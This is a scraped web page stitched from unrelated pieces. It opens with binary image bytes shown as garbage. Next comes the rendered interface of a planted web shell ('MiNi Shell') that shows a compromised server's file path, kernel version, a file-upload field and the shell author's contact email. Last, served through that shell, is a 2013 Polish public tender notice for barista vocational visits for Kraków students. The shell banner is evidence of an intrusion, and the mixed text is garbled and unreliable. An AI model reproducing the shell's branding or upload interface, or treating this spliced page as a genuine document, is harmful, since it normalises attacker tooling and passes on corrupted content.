JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131023/222131-N-2013.html

<p class="kh_header"><b>Kraków: Przeprowadzenie staży - wizyt zawodoznawczych pt. Barman-barista profesjonalista w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 222131 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiki Oświaty w Krakowie , ul. Ułanów 9, 31-450 Kraków, woj. małopolskie, tel. 12 617 88 88, faks 12 410 43 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeo.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie staży - wizyt zawodoznawczych pt. Barman-barista profesjonalista w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie w latach 2013 i 2014 w ramach współfinansowanego przez Unię Europejską z Europejskiego Funduszu Społecznego projektu pn. Modernizacja kształcenia zawodowego w Małopolsce staży - wizyt zawodoznawczych dla uczniów krakowskich szkół o profilu zawodowym zakończonych uzyskaniem przez uczniów zaświadczeń potwierdzających udział w stażu - wizycie zawodoznawczej.
Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie siedmiu jednodniowych staży - wizyt zawodoznawczych dla 14 grup młodzieży Zespołów Szkół Zawodowych w Krakowie z branży gastronomicznej kształcącej się w zawodach między innymi: kucharz, technik żywienia i usług gastronomicznych, kelner, technik żywienia i gospodarstwa domowego, technik kucharz, technik organizacji usług gastronomicznych w 3 zakładach na terenie Krakowa:
1/ Coffeshop Company, ul. Sławkowska 6, 31-014 Kraków,
2/ Drink Bar - Tajemniczy Ogród na Kazimierzu, Plac Nowy 9, 31-056 Kraków,
3/ Restauracja Garden Hotel Hilton, ul. Marii Konopnickiej 33, 30-302 Kraków.
Zbiórka uczestników na staże - wizyty zawodoznawcze (rozpoczęcie stażu) oraz zakończenie stażu dla każdej grupy nastąpią zgodnie z harmonogramem podanym w pkt 3.5 SIWZ.
Uczestnicy stażu-wizyty spotykają się w pierwszym wyznaczonym zakładzie, a do kolejnych zakładów przemieszczają się środkami komunikacji miejskiej (bilety zapewnia Wykonawca).
W sytuacjach nadzwyczajnych Wykonawca w uzgodnieniu z Liderem szkolnym Projektu może wyznaczyć inne zakłady na terenie Krakowa, z którym współpracuje do odbycia stażu - wizyty zawodoznawczej.
Liczba staży oraz liczba uczestników każdego stażu - wizyty zawodoznawczej:
Łączna liczba jednodniowych staży-wizyt zawodoznawczych: 7 (dla 14 grup), w tym: 3 w 2013 r. (dla 6 grup) oraz 4 w 2014 r. (dla 8 grup).
Jeden staż-wizyta zawodoznawcza obejmuje: 2 grupy po 15 uczniów tj. razem 30 uczniów oraz po 1 opiekunie przypadającym na jedną grupę uczniów zapewnionym przez Lidera szkolnego projektu.
Grupa uczestników liczy: 15 uczniów oraz 1 opiekun posiadający przygotowanie pedagogiczne zapewniony przez Lidera szkolnego projektu.
Wykonawca zobowiązany jest zapewnić w ramach każdego stażu - wizyty zawodoznawczej obecność co najmniej 1 osoby odpowiedzialnej za sprawy organizacyjne stażu - wizyty zawodoznawczej.
Ilość godzin lekcyjnych (45 min.) w ramach jednego stażu - wizyty zawodoznawczej: 8 (nie obejmuje czasu przerw, przejazdów).


Cele realizowane podczas stażu - wizyty zawodoznawczej:
Celem wizyty zawodoznawczej jest zapoznanie się z pracą barmana/baristy na stanowisku pracy: przygotowanie stanowiska, jego wyposażenie, czynności wstępne, praca właściwa barmana, prace końcowe na stanowisku barmana/ baristy, rozliczenie z klientem oraz z zakładem pracy.
Program powinien uwzględniać zawodoznawczy charakter wizyty.

Szczegółowe warunki dotyczące realizacji zamówienia:

1. a) Za uczestników staży - wizyt zawodoznawczych należy rozumieć zarówno uczniów, dla których realizowane są staże - wizyty zawodoznawcze, jak i opiekunów delegowanych przez Lidera szkolnego projektu.
b) Zadaniem opiekunów oddelegowanych przez Lidera szkolnego jest wyłącznie opieka i nadzór nad uczniami.
2. W ramach każdego stażu - wizyty zawodoznawczej grupę po zakładach pracy oprowadzają wyznaczeni pracownicy zakładów pracy posiadający wiedzę merytoryczną związaną z tematyką danego stażu - wizyty zawodoznawczej, a możliwość oprowadzania uczestników staży - wizyt zawodoznawczych po wskazanych zakładach pracy została wstępnie uzgodniona przez Lidera szkolnego projektu. Wykonawca zobowiązany jest umówić z zakładami pracy szczegóły przebiegu staży - wizyt zawodoznawczych. Wykonawca zobowiązany jest pokryć wszystkie koszty związane z pobytem we wskazanych zakładach pracy oraz koszt przejazdów środkami komunikacji miejskiej (biletów) dla wszystkich uczestników każdego stażu-wizyty zawodoznawczej.
3. Szczegółowe warunki dotyczące wyżywienia:
3.1.) W ramach każdego jednodniowego stażu - wizyty zawodoznawczej Wykonawca zobowiązany jest zapewnić wyżywienie dla każdego uczestnika każdego stażu - wizyty zawodoznawczej w postaci: 
1 x dwudaniowego obiadu składający się z: zupy, drugiego dania oraz deseru, a także jednego napoju gorącego lub zimnego (do wyboru przez uczestników) w ciągu stażu - wizyty zawodoznawczej.
3.2.) Szczegółowy jadłospis w zakresie wyżywienia zostanie uzgodniony i zaakceptowany przez Lidera szkolnego projektu przed terminem każdego stażu - wizyty zawodoznawczej.
4. Realizacja przedmiotu zamówienia powinna przebiegać zgodnie z obowiązującymi w tym zakresie przepisami prawa, w szczególności dotyczącymi wymogów sanitarnych stawianych osobom biorącym udział w realizacji usługi oraz miejscom przygotowania i podawania posiłków.
5. Wykonawca zobowiązuje się na czas trwania stażu - wizyty zawodoznawczej pokryć koszty ubezpieczenia NNW (tj. od następstw nieszczęśliwych wypadków) uczestników stażu - wizyty zawodoznawczej na kwoty co najmniej: NNW: 10 000,00 zł/osobę.
6. Wykonawca zobowiązuje się do dostarczenia potwierdzenia ubezpieczenia uczestników stażu 
- wizyty Liderowi szkolnemu projektu najpóźniej 1 dzień przed dniem stażu - wizyty zawodoznawczej, a Lider szkolny projektu przekazuje Wykonawcy imienną listę uczestników stażu - wizyty bezpośrednio w dniu stażu - wizyty zawodoznawczej.
7. Wybrany Wykonawca zobowiązany jest przedstawić Liderowi szkolnemu projektu - najpóźniej na   7 dni przed terminem każdego stażu - wizyty zawodoznawczej szczegółowy harmonogram stażu - wizyty zawodoznawczej, który będzie realizował, uzgodniony wcześniej z Liderem szkolnym projektu według zapisów zawartych w niniejszej SIWZ (z podaniem daty stażu-wizyty zawodoznawczej, miejsca i godzin stażu-wizyty, adresu punktu żywieniowego, szczegółowego jadłospisu, programu stażu - wizyty zawodoznawczej). W przypadku realizacji stażu - wizyty zawodoznawczej Nr 1 (dla Grupy 1, 2) dopuszcza się przedstawienie szczegółowego harmonogramu stażu - wizyty zawodoznawczej na 2 dni przed terminem stażu - wizyty zawodoznawczej.
8. Uczniowie, biorący udział w każdym stażu - wizycie zawodoznawczej potwierdzają korzystanie     z zapewnionego wyżywienia - na listach sporządzonych przez Wykonawcę, które następnie przekazuje Zamawiającemu.
9. Wykonawca zobowiązany jest w ramach każdego stażu - wizyty zawodoznawczej do zapewnienia dokumentacji fotograficznej z przebiegu stażu - wizyty zawodoznawczej, którą Wykonawca przekazuje Zamawiającemu w formie elektronicznej i papierowej. Wykonawca zobowiązany jest do uzyskania oświadczenia o użyczeniu wizerunku od uczestników każdego stażu-wizyty zawodoznawczej, które następnie przekazuje Liderowi szkolnemu projektu.
10. Wykonawca zobowiązany jest w ramach każdego stażu - wizyty zawodoznawczej przekazać nieodpłatnie dla każdego ucznia biorącego udział w każdym stażu - wizycie zawodoznawczej: notatnik A4, długopis, teczkę kartonową A4 - opatrzone logo projektu.
11. Wykonawca w ramach każdego stażu - wizyty zawodoznawczej opracowuje i przeprowadza wśród uczestników stażu - wizyty zawodoznawczej anonimową końcową ankietę, które następnie przekazuje Zamawiającemu.
12. Wykonawca w ramach stażu - wizyty zawodoznawczej prowadzi rejestry (listy obecności) osobno dla każdego z trzech modułów stażu-wizyty potwierdzający uczestnictwo uczniów w stażu - wizycie zawodoznawczej i przekazuje go Zamawiającemu.

Wykonawca wydaje każdemu uczniowi biorącemu udział w każdym stażu - wizycie zawodoznawczej, po odbyciu stażu - wizyty zawodoznawczej, zaświadczenie potwierdzające uczestnictwo w stażu - wizycie zawodoznawczej, a kserokopie zaświadczeń wraz ze zbiorczą listą/zestawieniem potwierdzającą/-cym ich odbiór przez uczniów biorących udział w każdym stażu - wizycie zawodoznawczej przekazuje Zamawiającemu.

Staże - wizyty zawodoznawcze Wykonawca realizował będzie z uwzględnieniem przepisów Rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 8 listopada 2001 r. w sprawie warunków
i sposobu organizowania przez publiczne przedszkola, szkoły i placówki krajoznawstwa i turystyki (Dz. U. z 2001 r. Nr 135, poz. 1516 ze zm.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1) Uzupełnienie pkt. III.4.3: Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Ponadto Wykonawca jest zobowiązany do złożenia następujących dokumentów: III.6.2) Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli Wykonawca ustanowił pełnomocnika w ww. zakresie. III.6.3) Wypełniony i podpisany przez Wykonawcę formularz ofertowy zawierający:- Nazwę (firmę) albo imię i nazwisko Wykonawcy, - Siedzibę (firmy) albo adres zamieszkania i adres (zakładu) Wykonawcy, - Numer NIP (nieobligatoryjnie), - Nazwę zadania stanowiącego przedmiot oferty, - Cenę oferty (c) - w rozumieniu art. 3.1 pkt. 1 Ustawy z dnia 5 lipca 2001r. o cenach (Dz. U. Nr 97, poz. 1050 z późn. zm.) i pkt. 13.1 SIWZ, - Części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Określono w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeo.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, Kraków, pok. 53.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 10:30, miejsce: Zespół Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, Kraków - dziennik podawczy/sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.4.16.1) Zamówienie realizowane jest w ramach współfinansowanego ze środków Unii Europejskiej należącego do Programu Operacyjnego Kapitał Ludzki projektu p.n. Modernizacja kształcenia zawodowego w Małopolsce. IV.4.16.2) Uzupełnienie pkt IV.4.1) Specyfikację istotnych warunków zamówienia (SIWZ) można odebrać w Zespole Ekonomiki Oświaty w Krakowie, ul. Ułanów 9, pokój nr 53 w poniedziałki w godz. 10:00 -15:00, w pozostałe dni robocze (z wyjątkiem czwartków) w godz. 10.00-14.00 (koszt materiałów: 7,00 zł, w tym 23 % VAT). W celu odebrania SIWZ niezbędne będzie podanie Zamawiającemu numeru NIP Wykonawcy. SIWZ dostępna jest także na stronie internetowej Zamawiającego www.zeo.krakow.pl Ww. uzupełnienie nie dotyczy pobierania SIWZ ze strony internetowej Zamawiającego. IV.4.16.3) Osoba upoważniona do kontaktów z Wykonawcami: Renata Gądkowska IV.4.16.4) Zamawiający nie zamierza zawrzeć umowy ramowej. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów. Przed wszczęciem postępowania o udzielenie zamówienia nie przeprowadzono dialogu technicznego. Nie przewiduje się udzielenia zamówień uzupełniających. Nie przewiduje się udzielenia zaliczek na poczet wykonania zamówienia. Nie ogranicza się możliwości ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne. Nie przewiduje się zastosowania aukcji elektronicznej. IV.4.16.5) Uzupełnienie pkt II.2) Termin realizacji zamówienia: każdy staż-wizyta zawodoznawcza odbywać się będzie jeden dzień w tygodniu - w poniedziałek lub we wtorek - w okresie od dnia zawarcia umowy do dnia 31.05.2014 r. z zastrzeżeniem, że:
Staż 1 (Grupa 1, 2): w okresie od dnia zawarcia umowy do dnia 07.12.2013 r.
Staż 2 (Grupa 3,4): w okresie od dnia zawarcia umowy do dnia 07.12.2013 r.
Staż 3 (Grupa 5, 6): w okresie od dnia zawarcia umowy do dnia 07.12.2013 r.
Staż 4 (Grupa 7, 8): w okresie od dnia 02.01.2014 r. do dnia 31.05.2014 r.
Staż 5 (Grupa 9, 10): w okresie od dnia 02.01.2014 r. do dnia 31.05.2014 r.
Staż 6 (Grupa 11, 12): w okresie od dnia 02.01.2014 r. do dnia 31.05.2014 r.
Staż 7 (Grupa 13, 14): w okresie od dnia 02.01.2014 r. do dnia 31.05.2014 r.
Dokładne terminy staży-wizyt zawodoznawczych zostaną uzgodnione przez Wykonawcę z wskazanymi w SIWZ zakładami pracy oraz z Liderem szkolnym projektu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com